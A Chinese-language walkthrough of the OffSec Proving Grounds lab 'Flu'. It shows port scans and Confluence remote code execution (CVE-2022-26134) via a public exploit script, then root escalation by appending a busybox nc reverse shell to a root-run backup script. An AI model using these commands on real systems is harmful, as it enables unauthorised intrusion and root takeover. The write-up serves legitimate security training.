本文最后更新于 2026年3月12日 下午
一、靶场详情
靶场名称:
Flu
靶场地址:
OffSec Proving Grounds Practice 实验环境
二、思路总结
突破边界:
Confluence 远程代码执行 –> confluence 用户权限 –> 用户旗帜
权限提升:
信息收集 –> /opt/log-backup.sh –> pspy 进程监控 –> 修改/opt/log-backup.sh 为反弹 shell –> root 用户权限 –> 管理员旗帜
三、靶场攻击演示
3.1 靶场信息收集
TCP 端口扫描:
1
2
3
4
5
6
| sudo nmap -p- 192.168.189.41 --min-rate=2000
PORT STATE SERVICE
22/tcp open ssh
8090/tcp open opsmessaging
8091/tcp open jamlink
|
UDP 端口扫描:未发现有价值信息。
TCP 服务信息搜集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| sudo nmap -p22,8090,8091 -sCV 192.168.189.41
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_ 256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open http Apache Tomcat (language: en)
| http-title: Log In - Confluence
|_Requested resource was /login.action?os_destination=%2Findex.action&permissionViolation=true
|_http-trane-info: Problem with XML parsing of /evox/about
8091/tcp open jamlink?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:20:28 GMT
| Connection: Close
| GetRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:53 GMT
| Connection: Close
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:54 GMT
| Connection: Close
| content-length: 0
| Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 414 Request-URI Too Long
| text is empty (possibly HTTP/0.9)
| RTSPRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:54 GMT
| Connection: Keep-Alive
| content-length: 0
| SIPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:20:35 GMT
| Connection: Keep-Alive
|_ content-length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
系统为 Linux 环境,开放有 HTTP、SSH 服务。
3.2 渗透测试突破边界
3.2.1 Confluence 远程代码执行(CVE-2022-26134)
依次访问靶机 8090、8091 端口,发现 8090 端口部署了 Confluence 应用,并在页面暴露了应用版本:7.13.6。
搜索引擎检索,发现该版本存在远程代码执行漏洞(CVE-2022-26134)。
参考链接:
1
| https://github.com/jbaines-r7/through_the_wire
|
下载漏洞利用脚本并执行,获取到系统 confluence 用户权限,注意: 脚本依赖本地 nc 工具建立反弹 shell,如果 nc 不在/usr/bin/nc,需指定 nc 具体位置(mac 系统自带的 nc 无法使用)。
1
2
| wget https://raw.githubusercontent.com/jbaines-r7/through_the_wire/refs/heads/main/through_the_wire.py
python3.9 through_the_wire.py --rhost 192.168.189.41 --rport 8090 --lhost 192.168.45.221 --protocol http:// --reverse-shell --nc-path /opt/homebrew/bin/nc
|
获取交互式 shell。
1
2
3
4
5
|
busybox nc 192.168.45.221 1234 -e /bin/bash
nc -lvnp 1234
|
3.2.2 用户旗帜获取
3.3 提权获取系统管理员权限
3.3.1 Pspy 进程监控,修改定时任务脚本提权至 root
在 opt 目录发现 log-backup.sh 脚本文件,并通过 pspy 得知系统会定时以 root 权限执行该文件,由于该文件属于 confluence 用户,可添加反弹 shell 获取系统 root 用户权限。
1
2
| nc -lvnp 1234
echo "busybox nc 192.168.45.221 1234 -e /bin/bash" >> log-backup.sh
|
3.3.2 管理员旗帜获取
Thanks
如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡
最后,祝您生活愉快!🌞✨